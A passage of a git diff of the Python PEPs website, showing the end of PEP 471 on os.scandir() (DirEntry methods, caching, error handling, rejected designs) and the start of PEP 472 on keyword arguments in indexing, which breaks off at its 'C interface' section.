Like listdir, scandir calls the operating system’s directory +iteration system calls to get the names of the files in the given +path, but it’s different from listdir in two ways:

+
    +
  • Instead of returning bare filename strings, it returns lightweight +DirEntry objects that hold the filename string and provide +simple methods that allow access to the additional data the +operating system may have returned.
  • +
  • It returns a generator instead of a list, so that scandir acts +as a true iterator instead of returning the full list immediately.
  • +
+

scandir() yields a DirEntry object for each file and +sub-directory in path. Just like listdir, the '.' +and '..' pseudo-directories are skipped, and the entries are +yielded in system-dependent order. Each DirEntry object has the +following attributes and methods:

+
    +
  • name: the entry’s filename, relative to the scandir path +argument (corresponds to the return values of os.listdir)
  • +
  • path: the entry’s full path name (not necessarily an absolute +path) – the equivalent of os.path.join(scandir_path, +entry.name)
  • +
  • inode(): return the inode number of the entry. The result is cached on +the DirEntry object, use os.stat(entry.path, +follow_symlinks=False).st_ino to fetch up-to-date information. +On Unix, no system call is required.
  • +
  • is_dir(*, follow_symlinks=True): similar to +pathlib.Path.is_dir(), but the return value is cached on the +DirEntry object; doesn’t require a system call in most cases; +don’t follow symbolic links if follow_symlinks is False
  • +
  • is_file(*, follow_symlinks=True): similar to +pathlib.Path.is_file(), but the return value is cached on the +DirEntry object; doesn’t require a system call in most cases; +don’t follow symbolic links if follow_symlinks is False
  • +
  • is_symlink(): similar to pathlib.Path.is_symlink(), but the +return value is cached on the DirEntry object; doesn’t require a +system call in most cases
  • +
  • stat(*, follow_symlinks=True): like os.stat(), but the +return value is cached on the DirEntry object; does not require a +system call on Windows (except for symlinks); don’t follow symbolic links +(like os.lstat()) if follow_symlinks is False
  • +
+

All methods may perform system calls in some cases and therefore +possibly raise OSError – see the “Notes on exception handling” +section for more details.

+

The DirEntry attribute and method names were chosen to be the same +as those in the new pathlib module where possible, for +consistency. The only difference in functionality is that the +DirEntry methods cache their values on the entry object after the +first call.

+

Like the other functions in the os module, scandir() accepts +either a bytes or str object for the path parameter, and +returns the DirEntry.name and DirEntry.path attributes with +the same type as path. However, it is strongly recommended +to use the str type, as this ensures cross-platform support for +Unicode filenames. (On Windows, bytes filenames have been deprecated +since Python 3.3).

+
+
+

os.walk()

+

As part of this proposal, os.walk() will also be modified to use +scandir() rather than listdir() and os.path.isdir(). This +will increase the speed of os.walk() very significantly (as +mentioned above, by 2-20 times, depending on the system).

+
+
+
+

Examples

+

First, a very simple example of scandir() showing use of the +DirEntry.name attribute and the DirEntry.is_dir() method:

+
def subdirs(path):
+    """Yield directory names not starting with '.' under given path."""
+    for entry in os.scandir(path):
+        if not entry.name.startswith('.') and entry.is_dir():
+            yield entry.name
+
+
+

This subdirs() function will be significantly faster with scandir +than os.listdir() and os.path.isdir() on both Windows and POSIX +systems, especially on medium-sized or large directories.

+

Or, for getting the total size of files in a directory tree, showing +use of the DirEntry.stat() method and DirEntry.path +attribute:

+
def get_tree_size(path):
+    """Return total size of files in given path and subdirs."""
+    total = 0
+    for entry in os.scandir(path):
+        if entry.is_dir(follow_symlinks=False):
+            total += get_tree_size(entry.path)
+        else:
+            total += entry.stat(follow_symlinks=False).st_size
+    return total
+
+
+

This also shows the use of the follow_symlinks parameter to +is_dir() – in a recursive function like this, we probably don’t +want to follow links. (To properly follow links in a recursive +function like this we’d want special handling for the case where +following a symlink leads to a recursive loop.)

+

Note that get_tree_size() will get a huge speed boost on Windows, +because no extra stat call are needed, but on POSIX systems the size +information is not returned by the directory iteration functions, so +this function won’t gain anything there.

+
+

Notes on caching

+

The DirEntry objects are relatively dumb – the name and +path attributes are obviously always cached, and the is_X +and stat methods cache their values (immediately on Windows via +FindNextFile, and on first use on POSIX systems via a stat +system call) and never refetch from the system.

+

For this reason, DirEntry objects are intended to be used and +thrown away after iteration, not stored in long-lived data structured +and the methods called again and again.

+

If developers want “refresh” behaviour (for example, for watching a +file’s size change), they can simply use pathlib.Path objects, +or call the regular os.stat() or os.path.getsize() functions +which get fresh data from the operating system every call.

+
+
+

Notes on exception handling

+

DirEntry.is_X() and DirEntry.stat() are explicitly methods +rather than attributes or properties, to make it clear that they may +not be cheap operations (although they often are), and they may do a +system call. As a result, these methods may raise OSError.

+

For example, DirEntry.stat() will always make a system call on +POSIX-based systems, and the DirEntry.is_X() methods will make a +stat() system call on such systems if readdir() does not +support d_type or returns a d_type with a value of +DT_UNKNOWN, which can occur under certain conditions or on +certain file systems.

+

Often this does not matter – for example, os.walk() as defined in +the standard library only catches errors around the listdir() +calls.

+

Also, because the exception-raising behaviour of the DirEntry.is_X +methods matches that of pathlib – which only raises OSError +in the case of permissions or other fatal errors, but returns False +if the path doesn’t exist or is a broken symlink – it’s often +not necessary to catch errors around the is_X() calls.

+

However, when a user requires fine-grained error handling, it may be +desirable to catch OSError around all method calls and handle as +appropriate.

+

For example, below is a version of the get_tree_size() example +shown above, but with fine-grained error handling added:

+
def get_tree_size(path):
+    """Return total size of files in path and subdirs. If
+    is_dir() or stat() fails, print an error message to stderr
+    and assume zero size (for example, file has been deleted).
+    """
+    total = 0
+    for entry in os.scandir(path):
+        try:
+            is_dir = entry.is_dir(follow_symlinks=False)
+        except OSError as error:
+            print('Error calling is_dir():', error, file=sys.stderr)
+            continue
+        if is_dir:
+            total += get_tree_size(entry.path)
+        else:
+            try:
+                total += entry.stat(follow_symlinks=False).st_size
+            except OSError as error:
+                print('Error calling stat():', error, file=sys.stderr)
+    return total
+
+
+
+
+
+

Support

+

The scandir module on GitHub has been forked and used quite a bit (see +“Use in the wild” in this PEP), but there’s also been a fair bit of +direct support for a scandir-like function from core developers and +others on the python-dev and python-ideas mailing lists. A sampling:

+
    +
  • python-dev: a good number of +1’s and very few negatives for +scandir and PEP 471 on this June 2014 python-dev thread
  • +
  • Alyssa Coghlan, a core Python developer: “I’ve had the local Red +Hat release engineering team express their displeasure at having to +stat every file in a network mounted directory tree for info that is +present in the dirent structure, so a definite +1 to os.scandir from +me, so long as it makes that info available.” +[source1]
  • +
  • Tim Golden, a core Python developer, supports scandir enough to +have spent time refactoring and significantly improving scandir’s C +extension module. +[source2]
  • +
  • Christian Heimes, a core Python developer: “+1 for something +like yielddir()” +[source3] +and “Indeed! I’d like to see the feature in 3.4 so I can remove my +own hack from our code base.” +[source4]
  • +
  • Gregory P. Smith, a core Python developer: “As 3.4beta1 happens +tonight, this isn’t going to make 3.4 so i’m bumping this to 3.5. +I really like the proposed design outlined above.” +[source5]
  • +
  • Guido van Rossum on the possibility of adding scandir to Python +3.5 (as it was too late for 3.4): “The ship has likewise sailed for +adding scandir() (whether to os or pathlib). By all means experiment +and get it ready for consideration for 3.5, but I don’t want to add +it to 3.4.” +[source6]
  • +
+

Support for this PEP itself (meta-support?) was given by Alyssa (Nick) Coghlan +on python-dev: “A PEP reviewing all this for 3.5 and proposing a +specific os.scandir API would be a good thing.” +[source7]

+
+
+

Use in the wild

+

To date, the scandir implementation is definitely useful, but has +been clearly marked “beta”, so it’s uncertain how much use of it there +is in the wild. Ben Hoyt has had several reports from people using it. +For example:

+
    +
  • Chris F: “I am processing some pretty large directories and was half +expecting to have to modify getdents. So thanks for saving me the +effort.” [via personal email]
  • +
  • bschollnick: “I wanted to let you know about this, since I am using +Scandir as a building block for this code. Here’s a good example of +scandir making a radical performance improvement over os.listdir.” +[source8]
  • +
  • Avram L: “I’m testing our scandir for a project I’m working on. +Seems pretty solid, so first thing, just want to say nice work!” +[via personal email]
  • +
  • Matt Z: “I used scandir to dump the contents of a network dir in +under 15 seconds. 13 root dirs, 60,000 files in the structure. This +will replace some old VBA code embedded in a spreadsheet that was +taking 15-20 minutes to do the exact same thing.” [via personal +email]
  • +
+

Others have requested a PyPI package for it, which has been +created. See PyPI package.

+

GitHub stats don’t mean too much, but scandir does have several +watchers, issues, forks, etc. Here’s the run-down as of the stats as +of July 7, 2014:

+
    +
  • Watchers: 17
  • +
  • Stars: 57
  • +
  • Forks: 20
  • +
  • Issues: 4 open, 26 closed
  • +
+

Also, because this PEP will increase the speed of os.walk() +significantly, there are thousands of developers and scripts, and a lot +of production code, that would benefit from it. For example, on GitHub, +there are almost as many uses of os.walk (194,000) as there are of +os.mkdir (230,000).

+
+
+

Rejected ideas

+
+

Naming

+

The only other real contender for this function’s name was +iterdir(). However, iterX() functions in Python (mostly found +in Python 2) tend to be simple iterator equivalents of their +non-iterator counterparts. For example, dict.iterkeys() is just an +iterator version of dict.keys(), but the objects returned are +identical. In scandir()’s case, however, the return values are +quite different objects (DirEntry objects vs filename strings), so +this should probably be reflected by a difference in name – hence +scandir().

+

See some relevant discussion on python-dev.

+
+
+

Wildcard support

+

FindFirstFile/FindNextFile on Windows support passing a +“wildcard” like *.jpg, so at first folks (this PEP’s author +included) felt it would be a good idea to include a +windows_wildcard keyword argument to the scandir function so +users could pass this in.

+

However, on further thought and discussion it was decided that this +would be bad idea, unless it could be made cross-platform (a +pattern keyword argument or similar). This seems easy enough at +first – just use the OS wildcard support on Windows, and something +like fnmatch or re afterwards on POSIX-based systems.

+

Unfortunately the exact Windows wildcard matching rules aren’t really +documented anywhere by Microsoft, and they’re quite quirky (see this +blog post), +meaning it’s very problematic to emulate using fnmatch or regexes.

+

So the consensus was that Windows wildcard support was a bad idea. +It would be possible to add at a later date if there’s a +cross-platform way to achieve it, but not for the initial version.

+

Read more on the this Nov 2012 python-ideas thread +and this June 2014 python-dev thread on PEP 471.

+
+ +
+

DirEntry attributes being properties

+

In some ways it would be nicer for the DirEntry is_X() and +stat() to be properties instead of methods, to indicate they’re +very cheap or free. However, this isn’t quite the case, as stat() +will require an OS call on POSIX-based systems but not on Windows. +Even is_dir() and friends may perform an OS call on POSIX-based +systems if the dirent.d_type value is DT_UNKNOWN (on certain +file systems).

+

Also, people would expect the attribute access entry.is_dir to +only ever raise AttributeError, not OSError in the case it +makes a system call under the covers. Calling code would have to have +a try/except around what looks like a simple attribute access, +and so it’s much better to make them methods.

+

See this May 2013 python-dev thread +where this PEP author makes this case and there’s agreement from a +core developers.

+
+
+

DirEntry fields being “static” attribute-only objects

+

In this July 2014 python-dev message, +Paul Moore suggested a solution that was a “thin wrapper round the OS +feature”, where the DirEntry object had only static attributes: +name, path, and is_X, with the st_X attributes only +present on Windows. The idea was to use this simpler, lower-level +function as a building block for higher-level functions.

+

At first there was general agreement that simplifying in this way was +a good thing. However, there were two problems with this approach. +First, the assumption is the is_dir and similar attributes are +always present on POSIX, which isn’t the case (if d_type is not +present or is DT_UNKNOWN). Second, it’s a much harder-to-use API +in practice, as even the is_dir attributes aren’t always present +on POSIX, and would need to be tested with hasattr() and then +os.stat() called if they weren’t present.

+

See this July 2014 python-dev response +from this PEP’s author detailing why this option is a non-ideal +solution, and the subsequent reply from Paul Moore voicing agreement.

+
+
+

DirEntry fields being static with an ensure_lstat option

+

Another seemingly simpler and attractive option was suggested by +Alyssa Coghlan in this June 2014 python-dev message: +make DirEntry.is_X and DirEntry.lstat_result properties, and +populate DirEntry.lstat_result at iteration time, but only if +the new argument ensure_lstat=True was specified on the +scandir() call.

+

This does have the advantage over the above in that you can easily get +the stat result from scandir() if you need it. However, it has the +serious disadvantage that fine-grained error handling is messy, +because stat() will be called (and hence potentially raise +OSError) during iteration, leading to a rather ugly, hand-made +iteration loop:

+
it = os.scandir(path)
+while True:
+    try:
+        entry = next(it)
+    except OSError as error:
+        handle_error(path, error)
+    except StopIteration:
+        break
+
+
+

Or it means that scandir() would have to accept an onerror +argument – a function to call when stat() errors occur during +iteration. This seems to this PEP’s author neither as direct nor as +Pythonic as try/except around a DirEntry.stat() call.

+

Another drawback is that os.scandir() is written to make code faster. +Always calling os.lstat() on POSIX would not bring any speedup. In most +cases, you don’t need the full stat_result object – the is_X() +methods are enough and this information is already known.

+

See Ben Hoyt’s July 2014 reply +to the discussion summarizing this and detailing why he thinks the +original PEP 471 proposal is “the right one” after all.

+
+
+

Return values being (name, stat_result) two-tuples

+

Initially this PEP’s author proposed this concept as a function called +iterdir_stat() which yielded two-tuples of (name, stat_result). +This does have the advantage that there are no new types introduced. +However, the stat_result is only partially filled on POSIX-based +systems (most fields set to None and other quirks), so they’re not +really stat_result objects at all, and this would have to be +thoroughly documented as different from os.stat().

+

Also, Python has good support for proper objects with attributes and +methods, which makes for a saner and simpler API than two-tuples. It +also makes the DirEntry objects more extensible and future-proof +as operating systems add functionality and we want to include this in +DirEntry.

+

See also some previous discussion:

+ +
+
+

Return values being overloaded stat_result objects

+

Another alternative discussed was making the return values to be +overloaded stat_result objects with name and path +attributes. However, apart from this being a strange (and strained!) +kind of overloading, this has the same problems mentioned above – +most of the stat_result information is not fetched by +readdir() on POSIX systems, only (part of) the st_mode value.

+
+
+

Return values being pathlib.Path objects

+

With Antoine Pitrou’s new standard library pathlib module, it +at first seems like a great idea for scandir() to return instances +of pathlib.Path. However, pathlib.Path’s is_X() and +stat() functions are explicitly not cached, whereas scandir +has to cache them by design, because it’s (often) returning values +from the original directory iteration system call.

+

And if the pathlib.Path instances returned by scandir cached +stat values, but the ordinary pathlib.Path objects explicitly +don’t, that would be more than a little confusing.

+

Guido van Rossum explicitly rejected pathlib.Path caching stat in +the context of scandir here, +making pathlib.Path objects a bad choice for scandir return +values.

+
+
+
+

Possible improvements

+

There are many possible improvements one could make to scandir, but +here is a short list of some this PEP’s author has in mind:

+
    +
  • scandir could potentially be further sped up by calling readdir +/ FindNextFile say 50 times per Py_BEGIN_ALLOW_THREADS block +so that it stays in the C extension module for longer, and may be +somewhat faster as a result. This approach hasn’t been tested, but +was suggested by on Issue 11406 by Antoine Pitrou. +[source9]
  • +
  • scandir could use a free list to avoid the cost of memory allocation +for each iteration – a short free list of 10 or maybe even 1 may help. +Suggested by Victor Stinner on a python-dev thread on June 27.
  • +
+
+
+

Previous discussion

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0471.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0472/index.html b/pep-0472/index.html new file mode 100644 index 00000000000..25b0bd36bfe --- /dev/null +++ b/pep-0472/index.html @@ -0,0 +1,800 @@ + + + + + + + + PEP 472 – Support for indexing with keyword arguments | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 472 – Support for indexing with keyword arguments

+
+
Author:
+
Stefano Borini, Joseph Martinot-Lagarde
+
Discussions-To:
+
Python-Ideas list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
24-Jun-2014
+
Python-Version:
+
3.6
+
Post-History:
+
02-Jul-2014
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes an extension of the indexing operation to support keyword +arguments. Notations in the form a[K=3,R=2] would become legal syntax. +For future-proofing considerations, a[1:2, K=3, R=4] are considered and +may be allowed as well, depending on the choice for implementation. In addition +to a change in the parser, the index protocol (__getitem__, __setitem__ +and __delitem__) will also potentially require adaptation.

+
+
+

Motivation

+

The indexing syntax carries a strong semantic content, differentiating it from +a method call: it implies referring to a subset of data. We believe this +semantic association to be important, and wish to expand the strategies allowed +to refer to this data.

+

As a general observation, the number of indices needed by an indexing operation +depends on the dimensionality of the data: one-dimensional data (e.g. a list) +requires one index (e.g. a[3]), two-dimensional data (e.g. a matrix) requires +two indices (e.g. a[2,3]) and so on. Each index is a selector along one of the +axes of the dimensionality, and the position in the index tuple is the +metainformation needed to associate each index to the corresponding axis.

+

The current python syntax focuses exclusively on position to express the +association to the axes, and also contains syntactic sugar to refer to +non-punctiform selection (slices)

+
>>> a[3]       # returns the fourth element of a
+>>> a[1:10:2]  # slice notation (extract a non-trivial data subset)
+>>> a[3,2]     # multiple indexes (for multidimensional arrays)
+
+
+

The additional notation proposed in this PEP would allow notations involving +keyword arguments in the indexing operation, e.g.

+
>>> a[K=3, R=2]
+
+
+

which would allow to refer to axes by conventional names.

+

One must additionally consider the extended form that allows both positional +and keyword specification

+
>>> a[3,R=3,K=4]
+
+
+

This PEP will explore different strategies to enable the use of these notations.

+
+
+

Use cases

+

The following practical use cases present two broad categories of usage of a +keyworded specification: Indexing and contextual option. For indexing:

+
    +
  1. To provide a more communicative meaning to the index, preventing e.g. accidental +inversion of indexes
    >>> gridValues[x=3, y=5, z=8]
    +>>> rain[time=0:12, location=location]
    +
    +
    +
  2. +
  3. In some domain, such as computational physics and chemistry, the use of a +notation such as Basis[Z=5] is a Domain Specific Language notation to represent +a level of accuracy
    >>> low_accuracy_energy = computeEnergy(molecule, BasisSet[Z=3])
    +
    +
    +

    In this case, the index operation would return a basis set at the chosen level +of accuracy (represented by the parameter Z). The reason behind an indexing is that +the BasisSet object could be internally represented as a numeric table, where +rows (the “coefficient” axis, hidden to the user in this example) are associated +to individual elements (e.g. row 0:5 contains coefficients for element 1, +row 5:8 coefficients for element 2) and each column is associated to a given +degree of accuracy (“accuracy” or “Z” axis) so that first column is low +accuracy, second column is medium accuracy and so on. With that indexing, +the user would obtain another object representing the contents of the column +of the internal table for accuracy level 3.

    +
  4. +
+

Additionally, the keyword specification can be used as an option contextual to +the indexing. Specifically:

+
    +
  1. A “default” option allows to specify a default return value when the index +is not present
    >>> lst = [1, 2, 3]
    +>>> value = lst[5, default=0]  # value is 0
    +
    +
    +
  2. +
  3. For a sparse dataset, to specify an interpolation strategy +to infer a missing point from e.g. its surrounding data.
    >>> value = array[1, 3, interpolate=spline_interpolator]
    +
    +
    +
  4. +
  5. A unit could be specified with the same mechanism
    >>> value = array[1, 3, unit="degrees"]
    +
    +
    +
  6. +
+

How the notation is interpreted is up to the implementing class.

+
+
+

Current implementation

+

Currently, the indexing operation is handled by methods __getitem__, +__setitem__ and __delitem__. These methods’ signature accept one argument +for the index (with __setitem__ accepting an additional argument for the set +value). In the following, we will analyze __getitem__(self, idx) exclusively, +with the same considerations implied for the remaining two methods.

+

When an indexing operation is performed, __getitem__(self, idx) is called. +Traditionally, the full content between square brackets is turned into a single +object passed to argument idx:

+
    +
  • When a single element is passed, e.g. a[2], idx will be 2.
  • +
  • When multiple elements are passed, they must be separated by commas: a[2, 3]. +In this case, idx will be a tuple (2, 3). With a[2, 3, "hello", {}] +idx will be (2, 3, "hello", {}).
  • +
  • A slicing notation e.g. a[2:10] will produce a slice object, or a tuple +containing slice objects if multiple values were passed.
  • +
+

Except for its unique ability to handle slice notation, the indexing operation +has similarities to a plain method call: it acts like one when invoked with +only one element; If the number of elements is greater than one, the idx +argument behaves like a *args. However, as stated in the Motivation section, +an indexing operation has the strong semantic implication of extraction of a +subset out of a larger set, which is not automatically associated to a regular +method call unless appropriate naming is chosen. Moreover, its different visual +style is important for readability.

+
+
+

Specifications

+

The implementation should try to preserve the current signature for +__getitem__, or modify it in a backward-compatible way. We will present +different alternatives, taking into account the possible cases that need +to be addressed

+
C0. a[1]; a[1,2]         # Traditional indexing
+C1. a[Z=3]
+C2. a[Z=3, R=4]
+C3. a[1, Z=3]
+C4. a[1, Z=3, R=4]
+C5. a[1, 2, Z=3]
+C6. a[1, 2, Z=3, R=4]
+C7. a[1, Z=3, 2, R=4]    # Interposed ordering
+
+
+
+

Strategy “Strict dictionary”

+

This strategy acknowledges that __getitem__ is special in accepting only +one object, and the nature of that object must be non-ambiguous in its +specification of the axes: it can be either by order, or by name. As a result +of this assumption, in presence of keyword arguments, the passed entity is a +dictionary and all labels must be specified.

+
C0. a[1]; a[1,2]      -> idx = 1; idx = (1, 2)
+C1. a[Z=3]            -> idx = {"Z": 3}
+C2. a[Z=3, R=4]       -> idx = {"Z": 3, "R": 4}
+C3. a[1, Z=3]         -> raise SyntaxError
+C4. a[1, Z=3, R=4]    -> raise SyntaxError
+C5. a[1, 2, Z=3]      -> raise SyntaxError
+C6. a[1, 2, Z=3, R=4] -> raise SyntaxError
+C7. a[1, Z=3, 2, R=4] -> raise SyntaxError
+
+
+
+

Pros

+
    +
  • Strong conceptual similarity between the tuple case and the dictionary case. +In the first case, we are specifying a tuple, so we are naturally defining +a plain set of values separated by commas. In the second, we are specifying a +dictionary, so we are specifying a homogeneous set of key/value pairs, as +in dict(Z=3, R=4);
  • +
  • Simple and easy to parse on the __getitem__ side: if it gets a tuple, +determine the axes using positioning. If it gets a dictionary, use +the keywords.
  • +
  • C interface does not need changes.
  • +
+
+
+

Neutral

+
    +
  • Degeneracy of a[{"Z": 3, "R": 4}] with a[Z=3, R=4] means the notation +is syntactic sugar.
  • +
+
+
+

Cons

+
    +
  • Very strict.
  • +
  • Destroys ordering of the passed arguments. Preserving the +order would be possible with an OrderedDict as drafted by PEP 468.
  • +
  • Does not allow use cases with mixed positional/keyword arguments such as +a[1, 2, default=5].
  • +
+
+
+
+

Strategy “mixed dictionary”

+

This strategy relaxes the above constraint to return a dictionary containing +both numbers and strings as keys.

+
C0. a[1]; a[1,2]      -> idx = 1; idx = (1, 2)
+C1. a[Z=3]            -> idx = {"Z": 3}
+C2. a[Z=3, R=4]       -> idx = {"Z": 3, "R": 4}
+C3. a[1, Z=3]         -> idx = { 0: 1, "Z": 3}
+C4. a[1, Z=3, R=4]    -> idx = { 0: 1, "Z": 3, "R": 4}
+C5. a[1, 2, Z=3]      -> idx = { 0: 1, 1: 2, "Z": 3}
+C6. a[1, 2, Z=3, R=4] -> idx = { 0: 1, 1: 2, "Z": 3, "R": 4}
+C7. a[1, Z=3, 2, R=4] -> idx = { 0: 1, "Z": 3, 2: 2, "R": 4}
+
+
+
+

Pros

+
    +
  • Opens for mixed cases.
  • +
+
+
+

Cons

+
    +
  • Destroys ordering information for string keys. We have no way of saying if +"Z" in C7 was in position 1 or 3.
  • +
  • Implies switching from a tuple to a dict as soon as one specified index +has a keyword argument. May be confusing to parse.
  • +
+
+
+
+

Strategy “named tuple”

+

Return a named tuple for idx instead of a tuple. Keyword arguments would +obviously have their stated name as key, and positional argument would have an +underscore followed by their order:

+
C0. a[1]; a[1,2]      -> idx = 1; idx = (_0=1, _1=2)
+C1. a[Z=3]            -> idx = (Z=3)
+C2. a[Z=3, R=2]       -> idx = (Z=3, R=2)
+C3. a[1, Z=3]         -> idx = (_0=1, Z=3)
+C4. a[1, Z=3, R=2]    -> idx = (_0=1, Z=3, R=2)
+C5. a[1, 2, Z=3]      -> idx = (_0=1, _2=2, Z=3)
+C6. a[1, 2, Z=3, R=4] -> (_0=1, _1=2, Z=3, R=4)
+C7. a[1, Z=3, 2, R=4] -> (_0=1, Z=3, _1=2, R=4)
+                      or (_0=1, Z=3, _2=2, R=4)
+                      or raise SyntaxError
+
+
+

The required typename of the namedtuple could be Index or the name of the +argument in the function definition, it keeps the ordering and is easy to +analyse by using the _fields attribute. It is backward compatible, provided +that C0 with more than one entry now passes a namedtuple instead of a plain +tuple.

+
+

Pros

+
    +
  • Looks nice. namedtuple transparently replaces tuple and gracefully +degrades to the old behavior.
  • +
  • Does not require a change in the C interface
  • +
+
+
+

Cons

+
    +
  • According to some sources [4] namedtuple is not well developed. +To include it as such important object would probably require rework +and improvement;
  • +
  • The namedtuple fields, and thus the type, will have to change according +to the passed arguments. This can be a performance bottleneck, and makes +it impossible to guarantee that two subsequent index accesses get the same +Index class;
  • +
  • the _n “magic” fields are a bit unusual, but ipython already uses them +for result history.
  • +
  • Python currently has no builtin namedtuple. The current one is available +in the “collections” module in the standard library.
  • +
  • Differently from a function, the two notations gridValues[x=3, y=5, z=8] +and gridValues[3,5,8] would not gracefully match if the order is modified +at call time (e.g. we ask for gridValues[y=5, z=8, x=3]). In a function, +we can pre-define argument names so that keyword arguments are properly +matched. Not so in __getitem__, leaving the task for interpreting and +matching to __getitem__ itself.
  • +
+
+
+
+

Strategy “New argument contents”

+

In the current implementation, when many arguments are passed to __getitem__, +they are grouped in a tuple and this tuple is passed to __getitem__ as the +single argument idx. This strategy keeps the current signature, but expands the +range of variability in type and contents of idx to more complex representations.

+

We identify four possible ways to implement this strategy:

+
    +
  • P1: uses a single dictionary for the keyword arguments.
  • +
  • P2: uses individual single-item dictionaries.
  • +
  • P3: similar to P2, but replaces single-item dictionaries with a (key, value) tuple.
  • +
  • P4: similar to P2, but uses a special and additional new object: keyword()
  • +
+

Some of these possibilities lead to degenerate notations, i.e. indistinguishable +from an already possible representation. Once again, the proposed notation +becomes syntactic sugar for these representations.

+

Under this strategy, the old behavior for C0 is unchanged.

+
C0: a[1]        -> idx = 1                    # integer
+    a[1,2]      -> idx = (1,2)                # tuple
+
+
+

In C1, we can use either a dictionary or a tuple to represent key and value pair +for the specific indexing entry. We need to have a tuple with a tuple in C1 +because otherwise we cannot differentiate a["Z", 3] from a[Z=3].

+
C1: a[Z=3]      -> idx = {"Z": 3}             # P1/P2 dictionary with single key
+                or idx = (("Z", 3),)          # P3 tuple of tuples
+                or idx = keyword("Z", 3)      # P4 keyword object
+
+
+

As you can see, notation P1/P2 implies that a[Z=3] and a[{"Z": 3}] will +call __getitem__ passing the exact same value, and is therefore syntactic +sugar for the latter. Same situation occurs, although with different index, for +P3. Using a keyword object as in P4 would remove this degeneracy.

+

For the C2 case:

+
C2. a[Z=3, R=4] -> idx = {"Z": 3, "R": 4}     # P1 dictionary/ordereddict
+                or idx = ({"Z": 3}, {"R": 4}) # P2 tuple of two single-key dict
+                or idx = (("Z", 3), ("R", 4)) # P3 tuple of tuples
+                or idx = (keyword("Z", 3),
+                          keyword("R", 4) )   # P4 keyword objects
+
+
+

P1 naturally maps to the traditional **kwargs behavior, however it breaks +the convention that two or more entries for the index produce a tuple. P2 +preserves this behavior, and additionally preserves the order. Preserving the +order would also be possible with an OrderedDict as drafted by PEP 468.

+

The remaining cases are here shown:

+
C3. a[1, Z=3]   -> idx = (1, {"Z": 3})                     # P1/P2
+                or idx = (1, ("Z", 3))                     # P3
+                or idx = (1, keyword("Z", 3))              # P4
+
+C4. a[1, Z=3, R=4] -> idx = (1, {"Z": 3, "R": 4})          # P1
+                   or idx = (1, {"Z": 3}, {"R": 4})        # P2
+                   or idx = (1, ("Z", 3), ("R", 4))        # P3
+                   or idx = (1, keyword("Z", 3),
+                                keyword("R", 4))           # P4
+
+C5. a[1, 2, Z=3]   -> idx = (1, 2, {"Z": 3})               # P1/P2
+                   or idx = (1, 2, ("Z", 3))               # P3
+                   or idx = (1, 2, keyword("Z", 3))        # P4
+
+C6. a[1, 2, Z=3, R=4] -> idx = (1, 2, {"Z":3, "R": 4})     # P1
+                      or idx = (1, 2, {"Z": 3}, {"R": 4})  # P2
+                      or idx = (1, 2, ("Z", 3), ("R", 4))  # P3
+                      or idx = (1, 2, keyword("Z", 3),
+                                      keyword("R", 4))     # P4
+
+C7. a[1, Z=3, 2, R=4] -> idx = (1, 2, {"Z": 3, "R": 4})    # P1. Pack the keyword arguments. Ugly.
+                      or raise SyntaxError                 # P1. Same behavior as in function calls.
+                      or idx = (1, {"Z": 3}, 2, {"R": 4})  # P2
+                      or idx =  (1, ("Z", 3), 2, ("R", 4)) # P3
+                      or idx =  (1, keyword("Z", 3),
+                                 2, keyword("R", 4))       # P4
+
+
+
+

Pros

+
    +
  • Signature is unchanged;
  • +
  • P2/P3 can preserve ordering of keyword arguments as specified at indexing,
  • +
  • P1 needs an OrderedDict, but would destroy interposed ordering if allowed: +all keyword indexes would be dumped into the dictionary;
  • +
  • Stays within traditional types: tuples and dicts. Evt. OrderedDict;
  • +
  • Some proposed strategies are similar in behavior to a traditional function call;
  • +
  • The C interface for PyObject_GetItem and family would remain unchanged.
  • +
+
+
+

Cons

+
    +
  • Apparently complex and wasteful;
  • +
  • Degeneracy in notation (e.g. a[Z=3] and a[{"Z":3}] are equivalent and +indistinguishable notations at the __[get|set|del]item__ level). +This behavior may or may not be acceptable.
  • +
  • for P4, an additional object similar in nature to slice() is needed, +but only to disambiguate the above degeneracy.
  • +
  • idx type and layout seems to change depending on the whims of the caller;
  • +
  • May be complex to parse what is passed, especially in the case of tuple of tuples;
  • +
  • P2 Creates a lot of single keys dictionary as members of a tuple. Looks ugly. +P3 would be lighter and easier to use than the tuple of dicts, and still +preserves order (unlike the regular dict), but would result in clumsy +extraction of keywords.
  • +
+
+
+
+

Strategy “kwargs argument”

+

__getitem__ accepts an optional **kwargs argument which should be keyword only. +idx also becomes optional to support a case where no non-keyword arguments are allowed. +The signature would then be either

+
__getitem__(self, idx)
+__getitem__(self, idx, **kwargs)
+__getitem__(self, **kwargs)
+
+
+

Applied to our cases would produce:

+
C0. a[1,2]            -> idx=(1,2);  kwargs={}
+C1. a[Z=3]            -> idx=None ;  kwargs={"Z":3}
+C2. a[Z=3, R=4]       -> idx=None ;  kwargs={"Z":3, "R":4}
+C3. a[1, Z=3]         -> idx=1    ;  kwargs={"Z":3}
+C4. a[1, Z=3, R=4]    -> idx=1    ;  kwargs={"Z":3, "R":4}
+C5. a[1, 2, Z=3]      -> idx=(1,2);  kwargs={"Z":3}
+C6. a[1, 2, Z=3, R=4] -> idx=(1,2);  kwargs={"Z":3, "R":4}
+C7. a[1, Z=3, 2, R=4] -> raise SyntaxError # in agreement to function behavior
+
+
+

Empty indexing a[] of course remains invalid syntax.

+
+

Pros

+
    +
  • Similar to function call, evolves naturally from it;
  • +
  • Use of keyword indexing with an object whose __getitem__ +doesn’t have a kwargs will fail in an obvious way. +That’s not the case for the other strategies.
  • +
+
+
+

Cons

+
    +
  • It doesn’t preserve order, unless an OrderedDict is used;
  • +
  • Forbids C7, but is it really needed?
  • +
  • Requires a change in the C interface to pass an additional +PyObject for the keyword arguments.
  • +
+
+
+
+
+

C interface

+

